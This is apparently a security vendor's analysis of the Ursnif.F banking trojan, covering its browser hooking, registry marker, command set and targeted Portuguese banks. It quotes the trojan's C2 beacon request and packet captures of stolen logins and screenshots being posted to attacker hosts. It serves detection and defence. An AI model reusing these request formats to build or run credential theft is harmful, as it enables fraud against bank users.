Trojan.Spy.Ursnif.F

Spreading:	medium
Damage:	high
Size:	approx 50k
Discovered:	2010 Oct 20

SYMPTOMS:

Extra http traffic.

TECHNICAL DESCRIPTION:

      Trojan.Spy.Ursnif is a malware that is able to steal personal information and control the infected computer.
      It finds out the type of browser (iexplorer, firefox, safari, chrome, opera), information used later for stealing specific passwords.
It takes a snapshot of all the processes and injects itself to iexplore or firefox and also hooks some functions: InternetReadFile,
InternetWriteFile, CreateProcess, HttpSendRequest  to intercept browser trafic.   
     The backdoor behaviour starts when it connects to a server that appers with diffrent host names : rettinasl.com, hasterulits.com, thecargotime.com, tryfindithere.com. From time to time it sends requests to the server. The request has a standard form:
    GET /cgi-bin/cmd.cgi?user_id=2806922672&version_id=2037028&passphrase=fkjvhsdvlksdhvlsd&socks=0&version=2037028&crc=00000000 HTTP/1.1

    The version id is memorized in a registry key:    
        Subkey = HKCU\Software\AppDataLow\{0a7cdb08-42c7-a17a-bc91-b0554eeb624f}
        Value    = Version
        Data      = Hex:001F1524 , Decimal:2037028
    The user_id is random.

    If the request succeeds and the connection is established the malware takes control:
      - it receives commands:
            - download               - DL_EXE=http://ne[removed].cn/sol.exe /DL_EXE_ST=http://ne[removed].cn /sol.exe ;
            - kill windows           - KILL (writes in "\\.\C:" a 0x10000 size buffer( the module of the current    process));
            - reboot system        - REBOOT;
             - take screenshots - SCREENSHOT;
            - delete cookies       - CLEAR_COOK;

      - when the user logs on diffrent internet accounts it sends the private information (user_name,passwords) to a remote location:
            example wireshark capture:

            POST /cgi-bin/forms.cgi HTTP/1.1
            Content-Type: multipart/form-data; boundary=--------------------------2b01852b01852b0185
            User-Agent: IE
            Host: tryfindithere.com
            Content-Length: 337
            Cache-Control: no-cache
            ----------------------------2b01852b01852b0185
            Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"
            Content-Type: application/octet-stream
             URL: http://fa[removed]war.com/index.php
            login_username=TEST&login_password=TEST&serverid=1&submitit.x=89&submitit.y=23
     
        - it downloads an encrypted buffer to a memory location that contains :
            - the names of some bank websites : millenniumbcp.pt , santandertotta.pt, grupobanif, caixaebanking.cgd.pt;
            - some javascript code to identify and steal passwords, user names, card pins from those bank websites;
  
        - also when the user logs on those bank websites, screenshot pictures are send to a remote location :
            example wireshark capture:
         
            POST /cgi-bin/ss.cgi HTTP/1.1
            Content-Type: multipart/form-data; boundary=--------------------------905c4c905c4c905c4c
            User-Agent: IE
            Host: thecargotime.com
            Content-Length: 146030
            Cache-Control: no-cache
            ----------------------------905c4c905c4c905c4c
            Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"
            Content-Type: application/octet-stream
  
       It creates events with restricted rights: denied for guest and anonymouse users ( D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)).
       Every action is executed by threads that are syncronized using critical sections or events.
        It uses a pipe for communication between threads (read/write).